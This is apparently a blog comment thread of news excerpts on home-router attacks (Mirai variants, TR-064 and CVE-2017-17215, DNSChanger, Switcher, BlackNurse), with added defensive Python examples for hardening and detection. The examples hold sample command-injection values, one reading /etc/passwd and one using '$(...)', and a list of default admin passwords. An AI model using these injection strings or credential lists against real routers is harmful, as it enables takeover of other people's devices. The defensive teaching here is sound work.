http://www.theregister.co.uk/2016/10/19/home_router_insecurity/
It is not just IoT devices that are hacked en masse. Home routers are hit also with their flaws.
Tomi Engdahl says:
Low-Bandwidth “BlackNurse” DDoS Attacks Can Disrupt Firewalls
http://www.securityweek.com/low-bandwidth-blacknurse-ddos-attacks-can-disrupt-firewalls
Some attacks based on the Internet Control Message Protocol (ICMP) can cause serious disruptions even over low
bandwidths.
ICMP attacks, also known as ping flood attacks, are highly common, but they typically rely on Type 8 Code 0 packets.
The attacks, dubbed by the company “BlackNurse,” can be highly effective even at bandwidths as low as 15-18 Mbps and
they can cause disruptions to firewalls even if the victim has an Internet connection of 1 Gbps.
“The impact we see on different firewalls is typically high CPU loads. When an attack is ongoing, users from the LAN side will no longer be able to send/receive traffic to/from the Internet. All firewalls we have seen recover when the attack stops,” TDC explained in a report detailing BlackNurse attacks.
A scan of the Danish IP address space revealed that there were over 1.7 million devices responding to ICMP pings,
which means these attacks can have a significant impact.
Researchers have so far confirmed that BlackNurse attacks work against Cisco ASA and SonicWall firewalls, but they
likely also affect products from Palo Alto Networks and other vendors. The Iptables firewall utility for Linux,
MikroTik products and OpenBSD are not affected.
Detection rules and proof-of-concept (PoC) code have been made available to allow users to identify attacks and test
their equipment.
http://soc.tdc.dk/blacknurse/blacknurse.pdf
Tomi Engdahl says:
Home Routers a Big Consumer Cyberthreat?
http://www.epanorama.net/newepa/2014/02/20/home-routers-a-big-consumer-cyberthreat/
Tomi Engdahl says:
‘Likely Hacker Attack’ Hits Almost 1 Million German Homes
http://www.securityweek.com/likely-hacker-attack-hits-almost-1-million-german-homes
Internet service for almost one million households in Germany was disrupted by likely deliberate hacking, provider Deutsche Telekom said Monday.
Around 900,000 customers using specific models of router have been affected since Sunday afternoon, the firm said, with some unable to connect at all while others suffered intermittent problems.
“We believe that influence was exerted on the routers from outside,” a Telekom spokesman told AFP, saying software had been installed on the devices that prevented them from connecting to the company’s network.
It did not provide details of which models of router — network hardware that connects households to their internet and telephone service provider — were affected.
Deutsche Telekom said that its engineers and colleagues from the companies that produce the devices had been working through the night to find a solution.
Customers affected have been advised to disconnect their routers from the network since the problems began on Sunday afternoon.
Germany has been the target of repeated cyber attacks in recent years.
Tomi Engdahl says:
German ISP Confirms Malware Attacks Caused Disruptions
http://www.securityweek.com/german-isp-confirms-malware-attacks-caused-disruptions
German telecommunications giant Deutsche Telekom has confirmed that more than 900,000 of its 20 million fixed-line network customers experienced Internet disruptions due to malware attacks on their routers.
In a press statement released on Monday, Deutsche Telekom said malicious actors had been trying to infect routers with malware, but the attempts failed, which led to 4-5 percent of devices crashing and preventing owners from going online.
Since the malware only resides in the router’s memory, customers have been advised to reboot their devices in order to clean the infection. Deutsche Telekom has also released a firmware update that should prevent infections on its Speedport routers.
Germany’s Federal Office for Information Security (BSI) reported that some government networks protected by the organization were also targeted in attacks. These attacks were mitigated by the existing protection mechanisms, the BSI said.
Attacks have been observed in several countries. Researchers determined that a piece of malware based on Mirai, whose source code was leaked recently, has been using port 7547 to hijack routers and modems.
Tomi Engdahl says:
100,000 UK Routers Likely Affected by Mirai Variant
http://www.securityweek.com/100000-uk-routers-likely-affected-mirai-variant
Approximately 100,000 UK TalkTalk and Post Office ISP users were affected by the recent Mirai attack that severely affected nearly a million Deutsche Telekom customers in Germany in late November. It was assumed that the UK victims were the outer ripples of the primary attack; and this was confirmed by a subsequent report that quoted the Mirai developer as apologizing for the effect on the Post Office. The UK disruption was apparently an accident and not done intentionally.
This version of events is now questioned by the findings of Pen Test Partners. Senior consultant Andrew Tierney reported Friday that the effect on TalkTalk routers was different to the effect on Deutsche Telekom routers. “We can’t see what is causing the claimed ISP outages for TalkTalk and the Post Office reported in the press. It shouldn’t stop the router routing, and as of yet, the bots haven’t taken part in any attacks.”
Pen Test Partners concluded, “Whilst the spread and purpose of the bot net is similar to Mirai, there are enough differences with this variant that it should really get a new name.”
TR-064 worm. It’s not Mirai and the outages are interesting
https://www.pentestpartners.com/blog/tr-064-worm-its-not-mirai-and-the-outages-are-interesting/
We’ve been looking at the code behind the worm that’s exploiting TalkTalk, PostOffice and many other Zyxel routers using the Allegro RomPager HTTP server.
What’s odd is that we can’t currently see why it’s causing outages, other than perhaps collapsing under the congestion of scanning for more vulnerable routers.
The vulnerability is fairly simple, and relies on a series of mistakes.
Port 7547 is open on these routers to listen for a “knock” to tell them to connect back to a provisioning server. It’s meant to be exposed to the WAN side of the router. This is part of TR-069, which has been discussed a lot in the past.
Curiously, it also appears that TR-064 is also available on port 7547. TR-064 is called “LAN-Side DSL CPE Configuration”, and unsurprisingly, is only meant to be exposed on the LAN side of the router.
The TR-064 specification requires authentication, but this seems to be missing.
Tomi Engdahl says:
TalkTalk’s wi-fi hack advice is ‘astonishing’
http://www.bbc.com/news/technology-38223805
TalkTalk’s handling of a wi-fi password breach is being criticised by several cyber-security experts.
The BBC has presented the company with evidence that many of its customers’ router credentials have been hacked, putting them at risk of data theft.
The UK broadband provider confirmed that the sample of stolen router IDs it had been shown was real.
But it is still advising users that there is “no need” to change their routers’ settings.
A cyber-security advisor to Europol said he was astounded by the decision.
“If TalkTalk has evidence that significant numbers of passwords are out in the wild, then at the very least they should be advising their customers to change their passwords,” said the University of Surrey’s Prof Alan Woodward.
“To say they see no need to do so is, frankly, astonishing.”
A spokeswoman for TalkTalk said that customers could change their settings “if they wish” but added that she believed there was “no risk to their personal information”.
She referred the BBC to another security expert. But when questioned, he also said the company should change its advice.
The BBC was subsequently contacted by someone who said he had access to a database of 57,000 router IDs that had been scraped before any fix had been rolled out.
He did not reveal his identity, but agreed to share a sample of the credentials that had been harvested.
The list contained details of about 100 routers including:
their service set identifier (SSID) codes and media access control (MAC) addresses. These can be entered into online tools that reveal the physical location of the routers
the router passwords, which would allow someone who travelled to the identified property to access the wi-fi network
The source said he wanted to highlight the problem because other more malevolent actors might have carried out a similar operation.
Prof Alan Woodward said once a hacker was outside a vulnerable property, they could:
snoop in the resident’s data, which might be clearly visible or encrypted in ways that still allowed the original information to be easily recovered
use the internet connection to mount an onward attack. The hacker could do this to hide their own identity or to co-opt the router to join an army of other compromised equipment in later DDoS (distributed denial of service) attacks
log in to the router as the administrator and mount a “man in the middle attack”, where apparently secure communications could be listened in on
substitute the router’s firmware with a modified version that provided a backdoor for later access even if the device was reset
‘Fast and loose’
TalkTalk’s spokeswoman referred the BBC to Steve Armstrong, a cyber-security instructor that she said would support it on the matter.
He said the risk to an individual user was relatively low.
“If you look at the average home user and what is on their home network, that would be exposed to an attacker,… then there is not a great deal.
“The risk is probably no higher than using a [coffee shop's] open wi-fi network.”
But he added that he still felt TalkTalk was giving the wrong advice.
“Part of my pushback to them is that they should be telling people, ‘You need to change your password,’” he said.
Tomi Engdahl says:
Hacker Claims To Push Malicious Firmware Update to 3.2 Million Home Routers
https://motherboard.vice.com/read/hacker-claims-to-push-malicious-firmware-update-to-32-million-home-routers
One of the hackers who amassed a new massive army of zombie internet-connected devices that can launch disruptive cyberattacks—even by mistake—now claims to have taken control of 3.2 million home routers, taking advantage of a flaw that allowed anyone to connect to them.
On Monday, the cybercriminal, who calls himself BestBuy, claimed to have set up a server that would automatically connect to vulnerable routers and push a malicious firmware update to them. This, he said, would grant him persistent access and the ability to lock out the owners as well as internet providers and device manufacturers.
“They are ours, even after reboot. They will not accept any new firmware from [Internet Service Provider] or anyone, and connect back to us every time :),” BestBuy said in an online chat. “Bots that cannot die until u throw device into the trash.”
Yet, they all agreed that BestBuy’s story was plausible, and potentially really bad news for the routers’ owners as well as their internet providers.
“Jesus christ,” said Darren Martyn, a security researcher who’s been tracking the recent wave of cyberattacks coming from hacked Internet of Things devices infected with Mirai. “Assuming [the hackers] didn’t fuck up repacking the firmware, and they didn’t do anything spectacularly stupid when backdooring it, their firmware backdoors will probably work just fine.”
None of the security researchers I contacted, however, could find one of the hacked routers in the wild.
“[It] would mean patching firmware for each different model and possibly even for each ISP,” he told Motherboard in an online chat. “Some firmware takes 15 minutes to patch, other can take days. But it is easy to mess up.”
Tomi Engdahl says:
Lucian Constantin / PCWorld:
Many models of Netgear routers exposed to critical remotely-exploitable security flaw; affected users recommended to stop using routers until patch is available
Nasty unpatched vulnerability exposes Netgear routers to easy hacking
The flaw allows hackers to execute arbitrary shell commands on affected devices.
http://www.pcworld.com/article/3149554/security/an-unpatched-vulnerability-exposes-netgear-routers-to-hacking.html
Several models of Netgear routers are affected by a publicly disclosed vulnerability that could allow hackers to take them over.
An exploit for the vulnerability was published Friday by a researcher who uses the online handle Acew0rm. He claims that he reported the flaw to Netgear in August, but didn’t hear back.
The issue stems from improper input sanitization in a form in the router’s web-based management interface and allows the injection and execution of arbitrary shell commands on an affected device.
The U.S. CERT Coordination Center (CERT CC) at Carnegie Mellon University rated the flaw as critical, assigning it a score of 9.3 out of 10 in the Common Vulnerability Scoring System (CVSS).
Netgear confirmed the vulnerability over the weekend and said that its R7000, R6400 and R8000 routers might be vulnerable. However, another researcher performed a test and reported that other routers from Netgear’s Nighthawk line are also affected. These include: R7000, R7000P, R7500, R7800, R8500 and R9000.
Since the vulnerability can be exploited with an HTTP request that doesn’t require authentication, hackers can attack the affected routers using cross-site request forgery attacks (CSRF). This works even when the routers don’t have their management interfaces exposed to the Internet.
CSRF attacks hijack users’ browsers when visiting specifically crafted webpages and send unauthorized requests through them. This makes it possible for a malicious website to force a user’s browser to exploit the router over the LAN.
CERT CC recommends that users stop using the affected routers until an official patch becomes available, if they can do so. However, there is a workaround that involves exploiting the flaw to stop the router’s web server and prevent future attacks.
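The root cause named above (a form field spliced into a shell command) and the CSRF angle both have standard fixes. The following is an added example, not Netgear's code or Acew0rm's exploit: a hypothetical "ping a host" form handler shown first the way the article describes the flaw (the command string is returned, not run, so it can be inspected safely), then hardened with an allowlist and an argv list that never touches a shell, plus the session-bound token and Origin check that stop a page in another tab from submitting the form through the user's browser.

```python
import hmac
import re
import subprocess

# Hypothetical form field: the host the user asks the router to ping.
# Allowlist: starts with a letter or digit, then letters, digits, dot, hyphen.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.\-]{0,252}$")


def vulnerable_command(host: str) -> str:
    """Builds the string an unsanitized handler would hand to `sh -c`.
    Returned instead of executed: ';', '|', '$(...)' in host become new commands."""
    return "ping -c 1 " + host


def hardened_argv(host: str) -> list:
    """Validates the field against the allowlist and returns an argv list.
    A list is passed straight to execve, so metacharacters are just bytes."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("host contains characters outside the allowlist")
    return ["ping", "-c", "1", host]


def run_hardened(host: str) -> subprocess.CompletedProcess:
    """shell=False is the default; no shell ever parses the host."""
    return subprocess.run(hardened_argv(host), capture_output=True, timeout=10)


def verify_csrf(session_token: str, form_token: str, origin: str, allowed_origin: str) -> bool:
    """Second layer: even a clean request must carry a token tied to the login
    session and come from the management UI's own origin (the browser sets the
    Origin header; a malicious page cannot forge it)."""
    if not session_token or not form_token:
        return False
    if not hmac.compare_digest(session_token.encode(), form_token.encode()):
        return False
    return origin == allowed_origin


if __name__ == "__main__":
    injected = "8.8.8.8; cat /etc/passwd"      # constructed malicious field value
    print("vulnerable would run:", vulnerable_command(injected))
    try:
        hardened_argv(injected)
    except ValueError as exc:
        print("hardened rejected it:", exc)
    print("clean argv:", hardened_argv("example.com"))
```

`run_hardened` exists to show that the argv list is used without `shell=True`; the checks a practitioner cares about are in `hardened_argv` and `verify_csrf`, which can be unit-tested without sending a packet.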
Tomi Engdahl says:
Hacker shows how easy it is to take over a city’s public Wi-Fi network
A buffer overflow in a single router model could have endangered thousands of Wi-Fi users
http://www.pcworld.com/article/3140627/security/hacker-shows-how-easy-it-is-to-take-over-a-citys-public-wi-fi-network.html
In a perfect example of how public wireless networks can be dangerous for privacy and security, an Israeli hacker showed that he could have taken over the free Wi-Fi network of an entire city.
On his way home from work one day, Amihai Neiderman, the head of research at Israeli cybersecurity firm Equus Technologies, spotted a wireless hotspot that he hadn’t seen before. What made it unusual was that it was in an area with no buildings.
It turned out that the hotspot he saw, advertised as “FREE_TLV,” was part of the citywide free Wi-Fi network set up by the local administration of Tel Aviv, Israel. This made Neiderman wonder: How secure is it?
Tomi Engdahl says:
TP-Link Debug Protocol Gives Up Keys To Kingdom
http://hackaday.com/2016/12/14/tp-link-debug-protocol-give-up-keys-to-kingdom/
[Andres] wanted to install a custom OS firmware on a cheap home router, so he bought a router known to be reflashable only to find that the newer version of the firmware made that difficult. We’ve all been there.
This is not a weekend hack — this took a professional many hours of serious labor. But it was made a lot easier because TP-Link left a debugging protocol active, listening on the LAN interface, and not requiring authentication.
(It’s not a bug, it’s a feature!) But still, this is an awesome hack!
Tomi Engdahl says:
Malvertising Campaign Infects Your Router Instead of Your Browser
https://it.slashdot.org/story/16/12/14/2059217/malvertising-campaign-infects-your-router-instead-of-your-browser
Malicious ads are serving exploit code to infect routers, instead of browsers, in order to insert ads in every site users are visiting. Unlike previous malvertising campaigns that targeted users of old Flash or Internet Explorer versions, this campaign focused on Chrome users, on both desktop and mobile devices. The malicious ads included in this malvertising campaign contain exploit code for 166 router models, which allow attackers to take over the device and insert ads on websites that didn’t feature ads, or replace original ads with the attackers’ own. Researchers haven’t yet managed to determine an exact list of affected router models, but some of the brands targeted by the attackers include Linksys, Netgear, D-Link, Comtrend, Pirelli, and Zyxel.
Malvertising Campaign Infects Your Router Instead of Your Browser
https://www.bleepingcomputer.com/news/security/malvertising-campaign-infects-your-router-instead-of-your-browser/
Exploit kit searches for vulnerable routers, not browsers or Flash installs
The way this entire operation works is by crooks buying ads on legitimate websites. The attackers insert malicious JavaScript in these ads, which use a WebRTC request to a Mozilla STUN server to determine the user’s local IP address.
Based on this local IP address, the malicious code can determine if the user is on a local network managed by a small home router, and continue the attack. If this check fails, the attackers just show a random legitimate ad and move on.
For the victims the crooks deem valuable, the attack chain continues. These users receive a tainted ad which redirects them to the DNSChanger EK home, where the actual exploitation begins.
The next step is for the attackers to send an image file to the user’s browser, which contains an AES (encryption algorithm) key embedded inside the photo using the technique of steganography.
The malicious ad uses this AES key to decrypt further traffic it receives from the DNSChanger exploit kit. Crooks encrypt their operations to avoid the prying eyes of security researchers.
Malvertising campaign targets 166 router models
After the user receives his encryption key, the DNSChanger exploit kit sends each victim a list of router “fingerprints.” Proofpoint researchers say they’ve seen the exploit kit serving 166 router fingerprints at the time of writing.
The malicious ad uses these fingerprints to test the router type the user is using, and then report back to the exploit kit’s server.
The DNSChanger EK replies back with exploit packages that can take over the router and change its DNS settings in order to relay traffic through the crooks’ servers.
Attackers use compromised routers to replace ads in the user’s normal traffic
Once the attack has gained control over the router, he can use it to replace legitimate ads with his own, or add advertisements on websites that didn’t feature ads.
While previous malvertising campaigns usually targeted users of Internet Explorer, this campaign focused on Chrome users, on both desktop and mobile devices. Ad replacement and insertion also takes place on traffic to mobile devices, not just desktops.
Updating router firmware is the recommended course of action
Because the attack is carried out via the user’s browser, using strong router passwords or disabling the administration interface is not enough.
The only way users can stay safe is if they update their router’s firmware to the most recent versions, which most likely includes protection against the vulnerabilities used by the DNSChanger EK.
Tomi Engdahl says:
Malvertising Campaign Targets Routers
http://www.securityweek.com/malvertising-campaign-targets-routers
A recently observed malvertising campaign is focused on compromising user’s home routers rather than exploiting vulnerabilities in their browsers.
Carried out by the actors behind the DNSChanger exploit kit (EK), the campaign doesn’t target browser or device vulnerabilities, but attempts to infect home or small office (SOHO) routers instead. The attackers use an improved version of the DNSChanger, which usually works through the Chrome browser on Windows desktops and Android devices, Proofpoint security researchers reveal.
Once the targeted router has been compromised, however, users are exposed to further malvertising, regardless of the device, operating system, or browser they use. The security researchers also note that the attacks on routers happen in waves likely associated with ongoing malvertising campaigns lasting several days, and they appear related to the “CSRF (Cross-Site Request Forgery) Soho Pharming” operations in the first half of 2015.
The campaign has grown from 55 fingerprints last year to 166, some of which are working for several router models, and the malvertising chain is now accepting Android devices as well, the security researchers explain.
Tomi Engdahl says:
“Switcher” Android Trojan Hacks Routers, Hijacks Traffic
http://www.securityweek.com/switcher-android-trojan-hacks-routers-hijacks-traffic
Researchers at Kaspersky Lab have come across a new Android Trojan that hacks routers and changes their DNS settings in an effort to redirect traffic to malicious websites.
Dubbed “Switcher,” the malware has been disguised as an Android client for the Chinese search engine Baidu, and a Chinese app for sharing Wi-Fi network details. Once users install one of these apps, the malware attempts to guess the username and password of the Wi-Fi router the infected Android device is connected to.
Switcher includes a list of more than two dozen username and password combinations that could allow it to access the router’s web administration interface, such as admin:admin, admin:123456, or admin:00000000.
“With the help of JavaScript it tries to login using different combinations of logins and passwords. Judging by the hardcoded names of input fields and the structures of the HTML documents that the trojan tries to access, the JavaScript code used will work only on web interfaces of TP-LINK Wi-Fi routers,” Nikita Buchka, mobile security expert at Kaspersky Lab, said in a blog post.
Switcher: Android joins the ‘attack-the-router’ club
https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/
Recently, in our never-ending quest to protect the world from malware, we found a misbehaving Android trojan. Although malware targeting the Android OS stopped being a novelty quite some time ago, this trojan is quite unique. Instead of attacking a user, it attacks the Wi-Fi network the user is connected to, or, to be precise, the wireless router that serves the network. The trojan, dubbed Trojan.AndroidOS.Switcher, performs a brute-force password guessing attack on the router’s admin web interface. If the attack succeeds, the malware changes the addresses of the DNS servers in the router’s settings, thereby rerouting all DNS queries from devices in the attacked Wi-Fi network to the servers of the cybercriminals (such an attack is also known as DNS-hijacking). So, let us explain in detail how Switcher performs its brute-force attacks, gets into the routers and undertakes its DNS-hijack.
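Both the DNSChanger malvertising campaign and Switcher end the same way: the router's DNS servers are rewritten, and Switcher gets in through factory-default admin credentials. The following is an added example, not Proofpoint's or Kaspersky's code: a small audit that flags configured resolvers that are neither the ISP's nor a well-known public resolver nor a LAN host, and flags an admin login that is still one of the default pairs the article lists. The ISP resolver addresses, the LAN prefix and the sample router settings are constructed for the example.

```python
import ipaddress

# Constructed: resolvers the ISP provisions (TEST-NET-3 addresses stand in for
# real ones) plus well-known public resolvers a user might set on purpose.
TRUSTED_RESOLVERS = {
    "203.0.113.53", "203.0.113.54",          # hypothetical ISP resolvers
    "8.8.8.8", "8.8.4.4", "1.1.1.1", "9.9.9.9",
}

# Constructed: the pairs the article names from Switcher's list, plus a few
# common ones; a real check would load the vendor's full default list.
DEFAULT_CREDENTIALS = {
    ("admin", "admin"), ("admin", "123456"), ("admin", "00000000"),
    ("admin", "password"), ("admin", ""), ("root", "root"),
}


def dns_hijack_indicators(configured, lan_network="192.168.1.0/24"):
    """Return the configured resolvers that are neither trusted nor on the LAN.
    A LAN address is allowed because a local filtering resolver is legitimate."""
    lan = ipaddress.ip_network(lan_network)
    suspicious = []
    for server in configured:
        try:
            addr = ipaddress.ip_address(server)
        except ValueError:
            suspicious.append(server)       # not even a valid address
            continue
        if server in TRUSTED_RESOLVERS or addr in lan:
            continue
        suspicious.append(server)
    return suspicious


def uses_default_credential(username, password):
    """True if the admin login is a combination a guessing trojan tries first."""
    return (username, password) in DEFAULT_CREDENTIALS


def audit_router(settings):
    """settings: dict with 'dns' (list), 'admin_user', 'admin_pass', optional 'lan'.
    Returns a list of human-readable findings; empty means nothing was flagged."""
    findings = []
    bad = dns_hijack_indicators(settings["dns"], settings.get("lan", "192.168.1.0/24"))
    if bad:
        findings.append("dns_hijack: unexpected resolvers " + ", ".join(bad))
    if uses_default_credential(settings["admin_user"], settings["admin_pass"]):
        findings.append("default_credential: change the admin password")
    return findings


# Constructed sample: DNS rewritten to an outside host, admin login still admin:admin.
SAMPLE = {
    "dns": ["198.51.100.7", "203.0.113.53"],
    "admin_user": "admin",
    "admin_pass": "admin",
}

if __name__ == "__main__":
    for finding in audit_router(SAMPLE):
        print(finding)
```

The resolver check is the one that catches both campaigns after the fact, since a hijacked router keeps working from the user's point of view; the credential check is what would have kept Switcher out in the first place.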
Tomi Engdahl says:
Hundreds of Thousands of Netgear Routers Vulnerable to Password Bypass
https://threatpost.com/hundreds-of-thousands-of-netgear-routers-vulnerable-to-password-bypass/123462/
Hundreds of thousands–potentially more than one million–Netgear routers are susceptible to a pair of vulnerabilities that can lead to password disclosure.
Researchers said that while anyone who has physical access to a router can exploit the vulnerabilities locally, the real threat is that the flaw can also be exploited remotely.
The vulnerabilities can be remotely exploited if the router’s remote management option is enabled.
While Netgear claims remote management is turned off on routers by default, Kenin said there are “hundreds of thousands, if not over a million” devices left remotely accessible.
Tomi Engdahl says:
FYI: You can blow Intel-powered broadband modems off the ‘net with a ‘trivial’ packet stream
All too easy to choke enemies’ gateways, it seems
https://www.theregister.co.uk/2017/04/27/intel_puma6_chipset_trivial_to_dos/
Broadband modems using Intel’s bungled Puma 6 chipset can be overloaded and virtually knocked offline by a trivial stream of packets, it is claimed.
Effectively, if there’s someone you don’t like, and they are one of thousands upon thousands of people using a Puma 6-powered home gateway, and you know their IP address, you can kick them off the internet, we’re told.
This week, inquisitive netizens discovered that, when presented with even modest amounts of packets – as little as 1.5Mbps – modems equipped with a Puma 6 can be slowed to a crawl.
According to one engineer who spoke to El Reg on the issue, the flaw would be “trivial” to exploit in the wild and would effectively render the targeted box useless for the duration.
“You send a stream of 200Kbps of TCP, UDP or maybe even ICMP to different port numbers and it has a tiny table to keep track of these and become immd unresponsive. It comes back after you stop,” our tipster explains.
“It can be exploited remotely and there is no way to mitigate the issue.”
This will be particularly frustrating for Puma 6 modem owners because the boxes are pitched as gigabit internet modems
The Puma 6 chipset is used in a number of ISP-branded cable modems
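The BlackNurse item earlier in this thread and the Puma 6 item above describe the same class of problem: a stream that is tiny in bandwidth but expensive for the device, so bandwidth-based alerting never fires. The following is an added example, not TDC's detection rules or anything from El Reg's tipster: two per-source detectors run over packet summaries. The first counts ICMP Type 3 Code 3 (destination unreachable, port unreachable, the packet type TDC's BlackNurse report identifies) per source per second; the second counts how many distinct (protocol, destination port) pairs one source hits per second, which is the "different port numbers" pattern the Puma 6 engineer describes. The record format, thresholds and the sample traffic are constructed for the example.

```python
from collections import defaultdict

# Record format (constructed for the example): (timestamp_seconds, source_ip,
# protocol, destination_port, icmp_type, icmp_code). Non-ICMP records carry
# None for the ICMP fields; ICMP records carry 0 for the port.

ICMP_DEST_UNREACH_PORT = (3, 3)   # Type 3 Code 3, the BlackNurse packet type


def blacknurse_sources(records, window=1.0, pps_threshold=1000):
    """Sources sending at least pps_threshold ICMP Type 3 Code 3 packets in any
    window-second bucket. The threshold is a tunable; a real firewall is not
    bothered by a few hundred of these per second, so the bar sits well above
    normal traceroute/unreachable noise."""
    buckets = defaultdict(int)
    for ts, src, proto, dport, itype, icode in records:
        if proto == "icmp" and (itype, icode) == ICMP_DEST_UNREACH_PORT:
            buckets[(src, int(ts // window))] += 1
    return sorted({src for (src, _), n in buckets.items() if n >= pps_threshold})


def port_fanout_sources(records, window=1.0, distinct_threshold=500):
    """Sources touching at least distinct_threshold distinct (proto, dport) pairs
    in any window-second bucket: a low-rate stream that still exhausts a small
    flow table. Byte counts are deliberately ignored; that is the point."""
    seen = defaultdict(set)
    for ts, src, proto, dport, itype, icode in records:
        if proto in ("tcp", "udp"):
            seen[(src, int(ts // window))].add((proto, dport))
    return sorted({src for (src, _), ports in seen.items() if len(ports) >= distinct_threshold})


# Constructed sample traffic, all inside the first second.
SAMPLE = []
# BlackNurse-like: 1500 ICMP Type 3 Code 3 from one source
SAMPLE += [(i / 1500, "198.51.100.10", "icmp", 0, 3, 3) for i in range(1500)]
# Puma-6-style fan-out: 600 small UDP packets to 600 different ports
SAMPLE += [(i / 600, "198.51.100.20", "udp", 1024 + i, None, None) for i in range(600)]
# Benign: a few echo requests and one HTTPS connection
SAMPLE += [(0.1 * i, "192.0.2.5", "icmp", 0, 8, 0) for i in range(5)]
SAMPLE += [(0.5, "192.0.2.5", "tcp", 443, None, None)]

if __name__ == "__main__":
    print("BlackNurse-pattern sources:", blacknurse_sources(SAMPLE))
    print("port fan-out sources:", port_fanout_sources(SAMPLE))
```

Both detectors key on packet counts and port spread rather than bytes per second, which is why they see what a bandwidth threshold misses; on a real sensor the records would come from NetFlow/IPFIX or a pcap rather than the constructed list.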
Tomi Engdahl says:
Mirai Variant “Satori” Targets Huawei Routers
http://www.securityweek.com/mirai-variant-satori-targets-huawei-routers
Hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers have been observed over the past month, Check Point security researchers warn.
The attacks were trying to drop Satori, an updated variant of the notorious Mirai botnet that managed to wreak havoc in late 2016. Targeting port 37215 on Huawei HG532 devices, the assaults were observed all around the world, including the USA, Italy, Germany and Egypt, the researchers say.
Common to these incidents was the attempt to exploit CVE-2017-17215, a zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed and intended for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).
The affected device supports a service type named `DeviceUpgrade`, which is supposedly carrying out firmware upgrade actions. By injecting shell meta-characters “$()” in two elements with which the upgrade is carried out, a remote administrator could execute arbitrary code on the affected devices.
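The Zyxel/TR-064 worm earlier in this thread and CVE-2017-17215 share the same three defects: a LAN-side configuration protocol reachable from the WAN, no authentication, and upgrade parameters that reach a shell unvalidated. The following is an added example, not Huawei's, Zyxel's or the TR-064 specification's code: a gate in front of a TR-064 endpoint that rejects requests from outside the LAN, requires a valid credential, and validates the `DeviceUpgrade` elements against a strict URL allowlist before anything is built from them, so "$()" and similar metacharacters cannot get through. The element names, the LAN prefix, the credential store and the sample parameters are assumptions made for the example.

```python
import hmac
import ipaddress
import re

LAN = ipaddress.ip_network("192.168.1.0/24")             # assumed LAN prefix
ADMIN_CREDENTIALS = {"admin": "correct horse battery"}     # constructed store

# Only an http(s) URL built from unreserved characters; '$', '(', ')', '`',
# ';', '|', '&', quotes and whitespace cannot appear anywhere in a match.
URL_RE = re.compile(r"^https?://[A-Za-z0-9.\-]+(:[0-9]{1,5})?(/[A-Za-z0-9._~\-/]*)?$")

# Assumed element names for the upgrade action and the validator for each.
UPGRADE_ELEMENTS = {"NewDownloadURL": URL_RE, "NewStatusURL": URL_RE}


def gate_request(source_ip, auth, action, params):
    """Return (allowed, reason). auth is a (user, password) tuple or None.
    Checks run in the order a request should fail: network, identity, input."""
    if ipaddress.ip_address(source_ip) not in LAN:
        return False, "source is not on the LAN"
    if auth is None:
        return False, "authentication required"
    stored = ADMIN_CREDENTIALS.get(auth[0])
    if stored is None or not hmac.compare_digest(stored.encode(), auth[1].encode()):
        return False, "authentication required"
    if action == "DeviceUpgrade":
        for name, pattern in UPGRADE_ELEMENTS.items():
            value = params.get(name, "")
            if not pattern.fullmatch(value):
                return False, f"{name} rejected by allowlist"
    return True, "ok"


# Constructed sample parameters.
GOOD_PARAMS = {
    "NewDownloadURL": "http://192.168.1.2/fw.bin",
    "NewStatusURL": "http://192.168.1.2/status",
}
INJECTED_PARAMS = {
    "NewDownloadURL": "http://192.168.1.2/fw.bin",
    "NewStatusURL": "http://198.51.100.5/$(x)",   # shell metacharacters in the element
}

if __name__ == "__main__":
    creds = ("admin", "correct horse battery")
    print(gate_request("203.0.113.9", creds, "DeviceUpgrade", GOOD_PARAMS))
    print(gate_request("192.168.1.20", None, "DeviceUpgrade", GOOD_PARAMS))
    print(gate_request("192.168.1.20", creds, "DeviceUpgrade", GOOD_PARAMS))
    print(gate_request("192.168.1.20", creds, "DeviceUpgrade", INJECTED_PARAMS))
```

In a real CPE the first check is better done by binding the service to the LAN interface only (and not forwarding 7547 or 37215 from the WAN) rather than by inspecting source addresses, but the ordering is the point: a WAN request should never get as far as parameter parsing, and even a LAN request with a good password should not be able to put anything but a URL into an upgrade element.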
Tomi Engdahl says:
Flaws Affecting Top-Selling Netgear Routers Disclosed
http://www.securityweek.com/flaws-affecting-top-selling-netgear-routers-disclosed
Security firm Trustwave has disclosed the details of several vulnerabilities affecting Netgear routers, including devices that are top-selling products on Amazon and Best Buy.
The flaws were discovered by researchers in March 2017 and they were patched by Netgear in August, September and October.
One of the high severity vulnerabilities has been described as a password recovery and file access issue affecting 17 Netgear routers and modem routers, including best-sellers such as R6400, R7000 (Nighthawk), R8000 (Nighthawk X6), and R7300DST (Nighthawk DST).
Tomi Engdahl says:
A LONG-AWAITED IOT CRISIS IS HERE, AND MANY DEVICES AREN’T READY
https://www.wired.com/story/upnp-router-game-console-vulnerabilities-exploited
YOU KNOW BY now that Internet of Things devices like your router are often vulnerable to attack, the industry-wide lack of investment in security leaving the door open to a host of abuses. Worse still, known weaknesses and flaws can hang around for years after their initial discovery. Even decades. And Monday, the content and web services firm Akamai published new findings that it has observed attackers actively exploiting a flaw in devices like routers and video game consoles that was originally exposed in 2006.
Over the last decade, reports have increasingly detailed the flaws and vulnerabilities that can plague insecure implementations of a set of networking protocols called Universal Plug and Play. But where these possibilities were largely academic before, Akamai found evidence that attackers are actively exploiting these weaknesses not to attack the devices themselves, but as a jumping off point for all sorts of malicious behavior, which could include DDoS attacks, malware distribution, spamming/phishing/account takeovers, click fraud, and credit card theft.
“We started talking about how many of these vulnerable devices are out there and what can they be leveraged for, because most people seem to have forgotten about this vulnerability,”
Down With UPnP
UPnP helps devices on a network find and essentially introduce themselves to each other, so that a server, say, can discover and vet the printers on a network.
When IoT devices expose too many of these mechanisms to the open internet without requiring authentication—or when credential checks are easily guessable or can be brute forced—attackers can then scan for devices that have implemented a few of these protocols badly all in one device, and then exploit this series of manufacturer missteps to launch an attack.
